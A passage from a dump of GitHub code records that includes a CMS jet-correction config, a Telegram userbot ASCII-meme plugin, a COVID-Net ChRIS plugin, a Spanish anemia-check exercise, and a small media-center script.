\")\n\n return lines\n\n\ndef read_files() -> str:\n lines: List[str] = []\n\n for file_entry in os.scandir(f\"{DIRECTORY}\"):\n if file_entry.is_file() and file_entry.name.endswith(\".json\"):\n with open(file_entry.path) as f:\n lines = convert(file_entry.path, f.read(), lines)\n\n return \"\\n\".join(lines)\n\n\ndef write_consolidated_file(contents: str) -> None:\n now = datetime.strftime(datetime.now(), \"%Y-%m-%d-%H-%M-%S\")\n with open(f\"{DIRECTORY}/{now}.html\", mode=\"w\", encoding=\"utf-8\") as f:\n f.write(\n f\"\"\"\n\n\n Consolidated Repo Scan, {datetime.now()}\n\n\n{contents}\n\n\n\"\"\"\n )\n\n\ndef convert_to_html():\n contents = read_files()\n write_consolidated_file(contents)\n\n\nif __name__ == \"__main__\":\n convert_to_html()\n","repo_name":"Ed-Fi-Alliance-OSS/DevSecOps","sub_path":"edfi-repo-auditor/edfi_repo_auditor/html_report.py","file_name":"html_report.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74947685984","text":"from UWVV.AnalysisTools.AnalysisFlowBase import AnalysisFlowBase\nimport FWCore.ParameterSet.Config as cms\nfrom PhysicsTools.PatAlgos.tools.jetTools import updateJetCollection\nfrom UWVV.Utilities.helpers import UWVV_BASE_PATH\nimport os\nfrom os import path\nimport pdb\n\nclass JetBaseFlow(AnalysisFlowBase):\n def __init__(self, *args, **kwargs):\n if not hasattr(self, 'isMC'):\n self.isMC = kwargs.pop('isMC', True)\n if not hasattr(self, 'year'):\n self.year = kwargs.pop('year', '2016')\n if not hasattr(self, 'runningLocal'):\n self.runningLocal = kwargs.pop('runningLocal', False)\n super(JetBaseFlow, self).__init__(*args, **kwargs)\n\n def makeAnalysisStep(self, stepName, **inputs):\n step = super(JetBaseFlow, self).makeAnalysisStep(stepName, **inputs)\n \n LeptonSetup = cms.string(self.year)\n cmsswversion=os.environ['CMSSW_VERSION']\n\n if stepName == 'preliminary':\n # Pileup veto\n # This puts the IDs in the event stream, not an updated\n # jet collection\n self.process.load(\"RecoJets.JetProducers.PileupJetID_cfi\")\n self.process.pileupJetIdUpdated = self.process.pileupJetId.clone(\n jets = step.getObjTag('j'),\n inputIsCorrected = True,\n applyJec = True,\n vertexes = step.getObjTag('v'),\n )\n step.addModule('pileupJetIdUpdated',\n self.process.pileupJetIdUpdated,\n 'puID', puID='fullId')\n \n '''if LeptonSetup==\"2018\":\n sqlitePath = '{0}.db'.format('Autumn18_V16_MC' if self.isMC else 'Autumn18_RunABCD_V19_DATA')\n pdb.set_trace()\n #dbPath = 'sqlite_file:' + path.join(UWVV_BASE_PATH, 'data', \n # sqlitePath)\n #sqlitePath = '{0}/src/UWVV/data/{1}.db'.format(cmsswversion,'Autumn18_V16_MC' if self.isMC else 'Autumn18_RunABCD_V16_DATA' )\n if self.runningLocal:\n sqPath = '{0}.db'.format('Autumn18_V16_MC' if self.isMC else 'Autumn18_RunABCD_V19_DATA')\n sqlitePath = path.join(UWVV_BASE_PATH, 'data', \n sqPath)\n print \"Running Locally\"\n \n dbPath = 'sqlite:' + sqlitePath\n \n JECtag=\"JetCorrectorParametersCollection_Autumn18_RunABCD_V16_DATA_AK4PFchs\"\n if self.isMC:\n JECtag=\"JetCorrectorParametersCollection_Autumn18_V16_MC_AK4PFchs\"\n #print \"JECtag: \",JECtag\n\n self.process.load(\"CondCore.CondDB.CondDB_cfi\")\n # Use this version to get it from a local db file\n #dbPath = 'sqlite:' + path.join(UWVV_BASE_PATH, 'data', \n # sqlitePath)\n print \"dbPath: \",dbPath\n JECDBESSource = cms.ESSource(\n \"PoolDBESSource\",\n self.process.CondDB,\n #DBParameters = cms.PSet(messageLevel = cms.untracked.int32(0)),\n #timetype = 
cms.string('runnumber'),\n toGet = cms.VPSet(cms.PSet(record = cms.string('JetCorrectionsRecord'),\n tag = cms.string(JECtag),\n label = cms.untracked.string('AK4PFchs')\n )\n ),\n #connect = cms.string(dbPath)\n )\n\n JECDBESSource.connect = cms.string(dbPath)\n\n step.addModule('JECDBESSource', JECDBESSource)\n \n self.process.es_prefer_jec = cms.ESPrefer('PoolDBESSource', 'JECDBESSource')'''\n\n\n # Jet energy corrections\n corrections = ['L1FastJet', 'L2Relative', 'L3Absolute',]\n if not self.isMC:\n corrections.append('L2L3Residual')\n updateJetCollection(\n self.process,\n jetSource = step.getObjTag('j'),\n labelName = 'UpdatedJEC',\n jetCorrections = ('AK4PFchs', cms.vstring(corrections), 'None'),\n )\n\n # Store PU ID in jet collection as a userInt\n self.process.updatedPatJetsUpdatedJEC.userData.userInts.src += [step.getObjTagString('puID')]\n\n self.process.jecSequence = cms.Sequence(\n self.process.patJetCorrFactorsUpdatedJEC\n * self.process.updatedPatJetsUpdatedJEC\n )\n step.addModule('jecSequence',\n self.process.jecSequence,\n 'j')\n\n if self.isMC:\n # shift corrections up and down for systematics\n jesShifts = cms.EDProducer(\n \"PATJetEnergyScaleShifter\",\n src = step.getObjTag('j'),\n )\n step.addModule('jesShifts', jesShifts, 'j_jesUp', 'j_jesDown',\n j_jesUp='jesUp', j_jesDown='jesDown')\n\n if self.isMC:\n patJetGenJetMatch = cms.EDProducer(\"GenJetMatcher\", # cut on deltaR; pick best by deltaR\n src = step.getObjTag('j'), # RECO jets (any View is ok)\n matched = cms.InputTag(\"slimmedGenJets\"), # GEN jets (must be GenJetCollection)\n mcPdgId = cms.vint32(), # n/a\n mcStatus = cms.vint32(), # n/a\n checkCharge = cms.bool(False), # n/a\n maxDeltaR = cms.double(0.4), # Minimum deltaR for the match\n #maxDPtRel = cms.double(3.0), # Minimum deltaPt/Pt for the match (not used in GenJetMatcher)\n resolveAmbiguities = cms.bool(True), # Forbid two RECO objects to match to the same GEN object\n resolveByMatchQuality = cms.bool(False), # False = just match input in order; True = pick lowest deltaR pair first\n )\n \n step.addModule(\"patJetGenJetMatch\",patJetGenJetMatch) #store RECO/gen jet association in the event\n\n #Print jet information\n #jetMatchViewerMy = cms.EDAnalyzer('JetMatchViewerMy',src=step.getObjTag('j'),match=cms.InputTag(\"patJetGenJetMatch\"),\n #tag=cms.string(step.getObjTagString('j')+'/after PUJetIDUpdated')\n # )\n #step.addModule('jetMatchViewerMy',jetMatchViewerMy)\n\n jsfFileP = path.join(UWVV_BASE_PATH, 'data', 'jetPUSF',\n 'scalefactorsPUID_81Xtraining.root')\n\n jeffFileP = path.join(UWVV_BASE_PATH, 'data', 'jetPUSF',\n 'effcyPUID_81Xtraining.root')\n \n jsfhist = \"h2_eff_sf%s_T\"%(int(self.year))\n jeffhist = \"h2_eff_mc%s_T\"%(int(self.year))\n\n jetIDEmbedding = cms.EDProducer(\n \"PATJetIDEmbedder\",\n src = step.getObjTag('j'),\n setup = cms.int32(int(self.year)),\n domatch = cms.bool(self.isMC),\n #jsfFile = cms.string(jsfFileP),\n #jeffFile = cms.string(jeffFileP),\n #SFhistName = cms.string(jsfhist),\n #effhistName = cms.string(jeffhist),\n )\n step.addModule('jetIDEmbedding', jetIDEmbedding, 'j') #,j=\"normaljet\") #produce jet and SF mulfac, distinguish jet with extra tag\n\n if self.isMC:\n \n\n jetIDEmbedding_jesUp = cms.EDProducer(\n \"PATJetIDEmbedder\",\n src = step.getObjTag('j_jesUp'),\n setup = cms.int32(int(self.year)),\n )\n step.addModule('jetIDEmbeddingJESUp', jetIDEmbedding_jesUp, 'j_jesUp')\n jetIDEmbedding_jesDown = cms.EDProducer(\n \"PATJetIDEmbedder\",\n src = step.getObjTag('j_jesDown'),\n setup = 
cms.int32(int(self.year)),\n )\n step.addModule('jetIDEmbeddingJESDown', jetIDEmbedding_jesDown, 'j_jesDown')\n\n\n jetSmearing = cms.EDProducer(\n \"PATJetSmearing\",\n src = step.getObjTag('j'),\n rhoSrc = cms.InputTag(\"fixedGridRhoFastjetAll\"),\n systematics = cms.bool(True),\n )\n step.addModule(\"jetSmearing\", jetSmearing, 'j', 'j_jerUp',\n 'j_jerDown', j_jerUp='jerUp', j_jerDown='jerDown')\n\n jetSmearing_jesUp = jetSmearing.clone(src = step.getObjTag('j_jesUp'),\n systematics = cms.bool(False))\n step.addModule(\"jetSmearingJESUp\", jetSmearing_jesUp, 'j_jesUp')\n jetSmearing_jesDown = jetSmearing.clone(src = step.getObjTag('j_jesDown'),\n systematics = cms.bool(False))\n step.addModule(\"jetSmearingJESDown\", jetSmearing_jesDown, 'j_jesDown')\n\n # need to re-sort now that we're calibrated\n jSort_jesUp = cms.EDProducer(\n \"PATJetCollectionSorter\",\n src = step.getObjTag('j_jesUp'),\n function = cms.string('pt'),\n )\n step.addModule('jetSortingJESUp', jSort_jesUp, 'j_jesUp')\n\n jSort_jesDn = cms.EDProducer(\n \"PATJetCollectionSorter\",\n src = step.getObjTag('j_jesDown'),\n function = cms.string('pt'),\n )\n step.addModule('jetSortingJESDn', jSort_jesDn, 'j_jesDown')\n\n jSort_jerUp = cms.EDProducer(\n \"PATJetCollectionSorter\",\n src = step.getObjTag('j_jerUp'),\n function = cms.string('pt'),\n )\n step.addModule('jetSortingJERUp', jSort_jerUp, 'j_jerUp')\n\n jSort_jerDn = cms.EDProducer(\n \"PATJetCollectionSorter\",\n src = step.getObjTag('j_jerDown'),\n function = cms.string('pt'),\n )\n step.addModule('jetSortingJERDn', jSort_jerDn, 'j_jerDown')\n\n # need to re-sort now that we're calibrated\n jSort = cms.EDProducer(\n \"PATJetCollectionSorter\",\n src = step.getObjTag('j'),\n function = cms.string('pt'),\n )\n step.addModule('jetSorting', jSort, 'j')\n\n if stepName == 'preselection':\n # For now, we're not using the PU ID, but we'll store it in the\n # ntuples later\n selectionString = ('pt > 30. && abs(eta) < 4.7 && '\n 'userFloat(\"idTight\") > 0.5 && (userInt(\"{}\") >= 0||pt>50.)').format(step.getObjTagString('puID'))\n \n selectionString2 = ('pt > 30. && abs(eta) < 4.7 && '\n 'userFloat(\"idTight\") > 0.5 && (userInt(\"{}\") >= 7||pt>50.)').format(step.getObjTagString('puID'))\n\n # # use medium PU ID\n # # PU IDs are stored as a userInt where the first three digits are\n # # tight, medium, and loose PUID decisions (going right to left)\n # selectionString = ('pt>30. 
&& abs(eta) < 4.7 && '\n # 'userFloat(\"idLoose\") > 0.5 && '\n # 'userInt(\"{}\") >= 6').format(step.getObjTagString('puID'))\n if self.isMC:\n step.addBasicSelector('j', selectionString) #not apply PU id here in order to calculate PU SF multiplication factor\n else:\n step.addBasicSelector('j', selectionString2)\n if self.isMC:\n step.addBasicSelector('j_jesUp', selectionString2)\n step.addBasicSelector('j_jesDown', selectionString2)\n step.addBasicSelector('j_jerUp', selectionString2)\n step.addBasicSelector('j_jerDown', selectionString2)\n\n return step\n\n\n\n\n\n\n","repo_name":"hhe62/UWVV","sub_path":"AnalysisTools/python/templates/JetBaseFlow.py","file_name":"JetBaseFlow.py","file_ext":"py","file_size_in_byte":12477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74346614942","text":"import asyncio\nimport random\nimport re\nimport time\nfrom random import choice, randint\nfrom collections import deque\nfrom telethon import events\nimport requests\n\nfrom telethon.tl.functions.users import GetFullUserRequest\nfrom telethon.tl.types import MessageEntityMentionName\n\n\nfrom userbot import CMD_HELP\nfrom userbot.utils import register\n\n@register(outgoing=True, pattern=\"^.fp$\")\nasync def facepalm(e):\n \"\"\" Facepalm 🤦‍♂ \"\"\"\n await e.edit(\"🤦‍♂\")\n\n@register(outgoing=True, pattern=\"^.corona$\")\nasync def iqless(e):\n await e.edit(\"Antivirus scan was completed \\n⚠️ Warning! This donkey has Corona Virus\")\n\n\n@register(outgoing=True, pattern=\"^.ggl (.*)\")\nasync def let_me_google_that_for_you(lmgtfy_q):\n textx = await lmgtfy_q.get_reply_message()\n qry = lmgtfy_q.pattern_match.group(1)\n if qry:\n query = str(qry)\n elif textx:\n query = textx\n query = query.message\n query_encoded = query.replace(\" \", \"+\")\n lfy_url = f\"http://lmgtfy.com/?s=g&iie=1&q={query_encoded}\"\n payload = {'format': 'json', 'url': lfy_url}\n r = requests.get('http://is.gd/create.php', params=payload)\n await lmgtfy_q.edit(f\"Tap this blue, help yourself.\\\n \\n[{query}]({r.json()['shorturl']})\")\n\n\n@register(pattern=r\".scam(?: |$)(.*)\", outgoing=True)\nasync def scam(event):\n \"\"\" Just a small command to fake chat actions for fun !! 
\"\"\"\n options = [\n 'typing', 'contact', 'game', 'location', 'voice', 'round', 'video',\n 'photo', 'document', 'cancel'\n ]\n input_str = event.pattern_match.group(1)\n args = input_str.split()\n if len(args) == 0: # Let bot decide action and time\n scam_action = choice(options)\n scam_time = randint(30, 60)\n elif len(args) == 1: # User decides time/action, bot decides the other.\n try:\n scam_action = str(args[0]).lower()\n scam_time = randint(30, 60)\n except ValueError:\n scam_action = choice(options)\n scam_time = int(args[0])\n elif len(args) == 2: # User decides both action and time\n scam_action = str(args[0]).lower()\n scam_time = int(args[1])\n else:\n await event.edit(\"`Invalid Syntax !!`\")\n return\n try:\n if (scam_time > 0):\n await event.delete()\n async with event.client.action(event.chat_id, scam_action):\n await sleep(scam_time)\n except BaseException:\n return\n\n\n@register(outgoing=True, pattern=\"^.fail$\")\nasync def fail(e):\n if not e.text[0].isalpha() and e.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n await e.edit(\"`\\n▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ `\" \n \"`\\n████▌▄▌▄▐▐▌█████ `\" \n \"`\\n████▌▄▌▄▐▐▌▀████ `\" \n \"`\\n▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ `\") \n\n\n@register(outgoing=True, pattern=\"^.loal$\")\nasync def lol(e):\n if not e.text[0].isalpha() and e.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n await e.edit(\"`\\n╱┏┓╱╱╱╭━━━╮┏┓╱╱╱╱ `\" \n \"`\\n╱┃┃╱╱╱┃╭━╮┃┃┃╱╱╱╱ `\" \n \"`\\n╱┃┗━━┓┃╰━╯┃┃┗━━┓╱ `\" \n \"`\\n╱┗━━━┛╰━━━╯┗━━━┛╱ `\") \n \n \n \n@register(outgoing=True, pattern=\"^.lool$\")\nasync def lool(e):\n if not e.text[0].isalpha() and e.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n await e.edit(\"`\\n╭╭━━━╮╮┈┈┈┈┈┈┈┈┈┈\\n┈┃╭━━╯┈┈┈┈▕╲▂▂╱▏┈\\n┈┃┃╱▔▔▔▔▔▔▔▏╱▋▋╮┈`\"\n \"`\\n┈┃╰▏┃╱╭╮┃╱╱▏╱╱▆┃┈\\n┈╰━▏┗━╰╯┗━╱╱╱╰┻┫┈\\n┈┈┈▏┏┳━━━━▏┏┳━━╯┈`\"\n \"`\\n┈┈┈▏┃┃┈┈┈┈▏┃┃┈┈┈┈ `\")\n \n\n\n\n@register(outgoing=True, pattern=\"^.nih$\")\nasync def nih(e):\n if not e.text[0].isalpha() and e.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n await e.edit(\"`\\n(\\_/)`\"\n \"`\\n(•_•)`\"\n \"`\\n >🌹 *`\"\n \"`\\n `\"\n \"`\\n(\\_/)`\"\n \"`\\n(•_•)`\"\n \"`\\n🌹<\\ *`\") \n\n\n@register(outgoing=True, pattern=\"^.ml(?: |$)(.*)\")\nasync def gtfo(e):\n message = e.pattern_match.group(1)\n if not e.text[0].isalpha() and e.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n await e.edit(\"`\\n█████████`\" \n \"`\\n█▄█████▄█`\" \n \"`\\n█▼▼▼▼▼`\" \n f\"`\\n█ {message}`\"\n \"`\\n█▲▲▲▲▲`\"\n \"`\\n█████████`\"\n \"`\\n ██ ██`\") \n\n\n@register(outgoing=True, pattern=\"^.taco$\") \nasync def taco(e):\n if not e.text[0].isalpha() and e.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n await e.edit(\"\\n{\\__/}\"\n \"\\n(●_●)\"\n \"\\n( >🌮 Want a taco?\")\n\n\n@register(outgoing=True, pattern=\"^.paw$\") \nasync def paw(e):\n if not e.text[0].isalpha() and e.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n await e.edit(\"`(=ↀωↀ=)\")\n\n\n@register(outgoing=True, pattern=\"^.tf$\") \nasync def tf(e):\n if not e.text[0].isalpha() and e.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n await e.edit(\"(̿▀̿ ̿Ĺ̯̿̿▀̿ ̿)̄ \") \n \n\n@register(outgoing=True, pattern=\"^.gay$\") \nasync def gey(e):\n if not e.text[0].isalpha() and e.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n await e.edit(\"`\\n┈┈┈╭━━━━━╮┈┈┈┈┈\\n┈┈┈┃┊┊┊┊┊┃┈┈┈┈┈`\"\n \"`\\n┈┈┈┃┊┊╭━╮┻╮┈┈┈┈\\n┈┈┈╱╲┊┃▋┃▋┃┈┈┈┈\\n┈┈╭┻┊┊╰━┻━╮┈┈┈┈`\"\n \"`\\n┈┈╰┳┊╭━━━┳╯┈┈┈┈\\n┈┈┈┃┊┃╰━━┫┈U GAY`\"\n \"\\n┈┈┈┈┈┈┏━┓┈┈┈┈┈┈\") \n\n\n@register(outgoing=True, pattern=\"^.bot$\")\nasync def bot(e):\n if not e.text[0].isalpha() and e.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n await e.edit(\"` 
\\n ╲╲╭━━━━╮ \\n╭╮┃▆┈┈▆┃╭╮ \\n┃╰┫▽▽▽┣╯┃ \\n╰━┫△△△┣━╯`\"\n \"`\\n╲╲┃┈┈┈┈┃ \\n╲╲┃┈┏┓┈┃ `\")\n\n\n@register(outgoing=True, pattern=\"^.hai$\")\nasync def hey(e):\n if not e.text[0].isalpha() and e.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n await e.edit(\"\\n┈┈┈╱▔▔▔▔╲┈╭━━━━━\\n┈┈▕▂▂▂▂▂��▏┃HELLO!┊😀`\"\n \"`\\n┈┈▕▔▇▔▔┳▔▏╰┳╮HELLO!┊\\n┈┈▕╭━╰╯━╮▏━╯╰━━━\\n╱▔▔▏▅▅▅▅▕▔▔╲┈┈┈┈`\"\n \"`\\n▏┈┈╲▂▂▂▂╱┈┈┈▏┈┈┈`\")\n\n\n@register(outgoing=True, pattern=\"^.nou$\")\nasync def nou(e):\n if not e.text[0].isalpha() and e.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n await e.edit(\"`\\n┈╭╮╭╮\\n┈┃┃┃┃\\n╭┻┗┻┗╮`\"\n \"`\\n┃┈▋┈▋┃\\n┃┈╭▋━╮━╮\\n┃┈┈╭╰╯╰╯╮`\"\n \"`\\n┫┈┈ NoU\\n┃┈╰╰━━━━╯`\"\n \"`\\n┗━━┻━┛`\")\n\n@register(outgoing=True, pattern=\"^.sayhi$\")\nasync def shalom(e):\n await e.edit(\n \"\\n💛💛💛💛💛💛💛💛💛\"\n \"\\n💛🔷🔷🔷🔷🔷🔷🔷💛\"\n \"\\n💛💛💛💛🔷💛💛💛💛\"\n \"\\n💛💛💛💛🔷💛💛💛💛\"\n \"\\n💛💛💛💛🔷💛💛💛💛\"\n \"\\n💛🔷🔷🔷🔷️🔷🔷🔷💛\"\n \"\\n💛💛💛💛💛💛💛💛💛\"\n \"\\n💛💛💛💛💛💛💛💛💛\"\n \"\\n💛🔷💛💛️💛💛💛🔷💛\"\n \"\\n💛🔷🔷🔷🔷🔷🔷🔷💛\"\n \"\\n💛🔷🔷🔷🔷🔷🔷️🔷💛\"\n \"\\n💛🔷💛💛💛💛️💛🔷💛\"\n \"\\n💛💛💛💛💛💛💛💛💛\")\n\n","repo_name":"Speedevs/J.A.R.V.I.S-Userbot","sub_path":"userbot/plugins/memes2.py","file_name":"memes2.py","file_ext":"py","file_size_in_byte":8354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"29768687859","text":"from setuptools import setup, find_packages\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\nwith open(path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='covicdbtools',\n version='0.0.1',\n description='A sample Python project',\n long_description=long_description,\n long_description_content_type='text/markdown',\n url='https://github.com/jamesaoverton/covic-db-tool-prototype',\n author='James A. Overton',\n author_email='james@overton.ca',\n classifiers=[ # Optional\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: Developers',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n ],\n package_dir={'': 'src'},\n packages=find_packages(where='src'),\n python_requires='>=3.6, <4',\n install_requires=['jinja2', 'openpyxl', 'pyyaml', 'tabulate', 'gitpython'],\n entry_points={\n \"console_scripts\": [\n \"cvdb = covicdbtools.cli:main\",\n ],\n },\n)\n","repo_name":"jamesaoverton/covic-db-tool-prototype","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"41855828948","text":"#Tomando como base los resultados obtenidos en un laboratorio de análisis clínicos, un médico determina \n#si una persona tiene anemia o no, lo cual depende de su nivel de hemoglobina en la sangre, de su edad y de su sexo. \n#Si el nivel de hemoglobina que tiene una persona es menor que el rango que le corresponde, se determina su resultado \n#como positivo y en caso contrario como negativo. La tabla en la que el médico se basa para obtener el resultado es la \n#siguiente:\n\nnivelHem = int(input(\"Cual es el nivel de hemogoblina del paciente? \"))\nunidad = input(\"El paciente tiene más de un año? (si) (no)\")\n\nif unidad == \"no\":\n\tedad = int(input(\"Cuantos meses tiene? \"))\n\tif edad > 0 and edad <= 1:\n\t\trangoMin = 13\n\telif edad > 1 and edad <= 6:\n\t\trangoMin = 10\n\telif edad > 6 and edad <= 12:\n\t\trangoMin = 11\nelse:\n\tedad = int(input(\"Cuantos años tiene? 
\"))\n\tif edad > 1 and edad <= 5:\n\t\trangoMin = 11.5\n\telif edad > 5 and edad <= 10:\n\t\trangoMin = 12.6\n\telif edad > 10 and edad <= 15:\n\t\trangoMin = 13\n\telse:\n\t\tgenero = input(\"Es hombre (h) o mujer (m)? \")\n\t\tif genero == \"mujer\":\n\t\t\trangoMin = 12\n\t\telse:\n\t\t\trangoMin = 14\n\nif nivelHem < rangoMin:\n\tprint(\"El paciente sufre de anemia\")\nelse:\n\tprint(\"El paciente está sano\")\n","repo_name":"ArturoRuge/python-exercises","sub_path":"condicionales/3-12.py","file_name":"3-12.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24326849985","text":"#\n# topo_covidnet ds ChRIS plugin app\n#\n# (c) 2021 Fetal-Neonatal Neuroimaging & Developmental Science Center\n# Boston Children's Hospital\n#\n# http://childrenshospital.org/FNNDSC/\n# dev@babyMRI.org\n#\n\nfrom chrisapp.base import ChrisApp\nimport os\nimport sys\nfrom .inference import Inference\n\nGstr_title = \"\"\"\n _ _ _ _ \n| | (_) | | | | \n| |_ ___ _ __ ___ ___ _____ ___ __| |_ __ ___| |_ \n| __/ _ \\| '_ \\ / _ \\ / __/ _ \\ \\ / / |/ _` | '_ \\ / _ \\ __|\n| || (_) | |_) | (_) | (_| (_) \\ V /| | (_| | | | | __/ |_ \n \\__\\___/| .__/ \\___/ \\___\\___/ \\_/ |_|\\__,_|_| |_|\\___|\\__|\n | | ______ \n |_| |______| \n\"\"\"\n\nGstr_synopsis = \"\"\"\n\n(Edit this in-line help for app specifics. At a minimum, the \nflags below are supported -- in the case of DS apps, both\npositional arguments and ; for FS and TS apps\nonly -- and similarly for directories\nwhere necessary.)\n\n NAME\n\n topo_covidnet.py \n\n SYNOPSIS\n\n python topo_covidnet.py \\\\\n [-h] [--help] \\\\\n [--json] \\\\\n [--man] \\\\\n [--meta] \\\\\n [--savejson ] \\\\\n [-v ] [--verbosity ] \\\\\n [--version] \\\\\n \\\\\n \n\n BRIEF EXAMPLE\n\n * Bare bones execution\n\n docker run --rm -u $(id -u) \\\n -v $(pwd)/in:/incoming -v $(pwd)/out:/outgoing \\\n fnndsc/pl-topo_covidnet topo_covidnet \\\n /incoming /outgoing\n\n DESCRIPTION\n\n `topo_covidnet.py` ...\n\n ARGS\n\n [-h] [--help]\n If specified, show help message and exit.\n \n [--json]\n If specified, show json representation of app and exit.\n \n [--man]\n If specified, print (this) man page and exit.\n\n [--meta]\n If specified, print plugin meta data and exit.\n \n [--savejson ] \n If specified, save json representation file to DIR and exit. \n \n [-v ] [--verbosity ]\n Verbosity level for app. Not used currently.\n \n [--version]\n If specified, print version number and exit. 
\n\"\"\"\n\n\nclass Topo_covidnet(ChrisApp):\n \"\"\"\n An app to work with TS plugins\n \"\"\"\n PACKAGE = __package__\n TITLE = 'A copy of COVIDNET to work on TS plugins'\n CATEGORY = ''\n TYPE = 'ds'\n ICON = '' # url of an icon image\n MIN_NUMBER_OF_WORKERS = 1 # Override with the minimum number of workers as int\n MAX_NUMBER_OF_WORKERS = 1 # Override with the maximum number of workers as int\n MIN_CPU_LIMIT = 1000 # Override with millicore value as int (1000 millicores == 1 CPU core)\n MIN_MEMORY_LIMIT = 200 # Override with memory MegaByte (MB) limit as int\n MIN_GPU_LIMIT = 0 # Override with the minimum number of GPUs as int\n MAX_GPU_LIMIT = 0 # Override with the maximum number of GPUs as int\n OUTPUT_META_DICT = {}\n\n def define_parameters(self):\n \"\"\"\n Arguments accepted by plugin\n \"\"\"\n self.add_argument('--parInst',\n \tdest = 'parInst',\n \ttype = str,\n \toptional = True,\n \thelp = 'Parent instance ID',\n default = 'patient_folder')\n self.add_argument('--metaname', \n dest = 'metaname', \n type = str, \n optional = True,\n help = 'Name of ckpt meta file',\n default = 'model.meta')\n self.add_argument('--imagefile', \n dest = 'imagefile', \n type = str, \n optional = False,\n help = 'Name of image file to infer from')\n self.add_argument('--in_tensorname', \n dest = 'in_tensorname', \n type = str, \n optional = True,\n help = 'Name of input tensor to graph',\n default = 'input_1:0')\n self.add_argument('--out_tensorname', \n dest = 'out_tensorname', \n type = str, \n optional = True,\n help = 'Name of output tensor from graph',\n default = 'norm_dense_1/Softmax:0')\n self.add_argument('--input_size', \n dest = 'input_size', \n type = int, \n optional = True,\n help = 'Size of input (ex: if 480x480, --input_size 480)',\n default = 480)\n self.add_argument('--top_percent', \n dest = 'top_percent', \n type = float, \n optional = True,\n help = 'Percent top crop from top of image',\n default = 0.08)\n\n def run(self, options):\n \"\"\"\n Define the code to be run by this plugin app.\n \"\"\"\n print(Gstr_title)\n print('Version: %s' % self.get_version())\n all_three_models = [\n # {\n # 'weightspath':'/models/COVIDNet-CXR3-A',\n # 'ckptname':'model-2856',\n # 'modelused':'modelA'\n # }, \n {\n 'weightspath':'/usr/local/lib/covidnet/COVIDNet-CXR4-B',\n 'ckptname':'model-1545',\n 'modelused':'modelB'\n },\n # {\n # 'weightspath': '/models/COVIDNet-CXR3-C',\n # 'ckptname':'model-0',\n # 'modelused':'modelC'\n # }\n ]\n for model in all_three_models:\n options.weightspath =model['weightspath']\n options.ckptname = model['ckptname']\n options.modelused = model['modelused']\n infer_obj = Inference(options)\n infer_obj.infer()\n\n def show_man_page(self):\n \"\"\"\n Print the app's man page.\n \"\"\"\n print(Gstr_synopsis)\n","repo_name":"thehanriver/pl-topo_covidnet","sub_path":"topo_covidnet/topo_covidnet.py","file_name":"topo_covidnet.py","file_ext":"py","file_size_in_byte":6930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7667026379","text":"#!/usr/bin/env python3\n#-\n# ## ###############################################\n#\n# MediaCenter.py\n# File main\n#\n# Autor: \n# License: MIT\n#\n# ## ###############################################\n\nimport tkinter as tk\nfrom tkinter import PhotoImage\nfrom PIL import Image,ImageTk\nfrom tkinter import filedialog as fd\nfrom tkinter import messagebox\nimport mediaLector as ml\nimport multiprocessing\n\ndef openFile():\n\t\"\"\"This function open files of type .bmp 
.png and .jpg\"\"\"\n\tfile = fd.askopenfilename(initialdir = os.getcwd(), title = 'Seleccione archivo', defaultextension = '*.*', filetypes = (('png files','*.png'),('jpg files','*.jpg'),('bmp files','*.bmp')))\n\t\ndef openDireactory():\n\t\"\"\"This function open a directory media\"\"\"\n\tdirectory = fd.askdirectory()\n\tprint('directory: ', directory)\n\tml.playMedia(directory)\n\t\ndef eventUSB(directory, play):\n\tprint('Abriendo multimedios...')\n\tif play:\n\t\tml.playUSB(directory)\n\t\ndef checkUSBconnection(var):\n\tplay = True\n\twhile True:\n\t\td={}\n\t\tfor l in open('/proc/mounts'):\n\t\t\tif(l[0] == '/'):\n\t\t\t\tl = l.split()\n\t\t\t\td[l[0]] = l[1]\n\t\t\t\n\t\tif('/dev/sdb1' in d):\n\t\t\teventUSB(d['/dev/sdb1'], play)\n\t\t\tplay = False\n","repo_name":"Alma-Vigueras/ProyectoFinalFSE","sub_path":"src/MediaCenter.py","file_name":"MediaCenter.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"10616592638","text":"#Lewis Mazzei - Fusion/Code/drawing.py\n#Note: If a comment is not on the same line then the corresponding comment to a line or chunk of code will be above it\n\n#import relevant packages\nimport pygame, pickle\n#colours file: stores colour values for each tile value\nfrom colours import tileColours\n#setup file: includes all functions needed for setting up pygame window and some constant variables needed throughout the process of running the game\nfrom setup import DISPLAY_WIDTH, DISPLAY_HEIGHT, display, clock, BLACK, WHITE, gridDictCoords, gridDictDimensions, 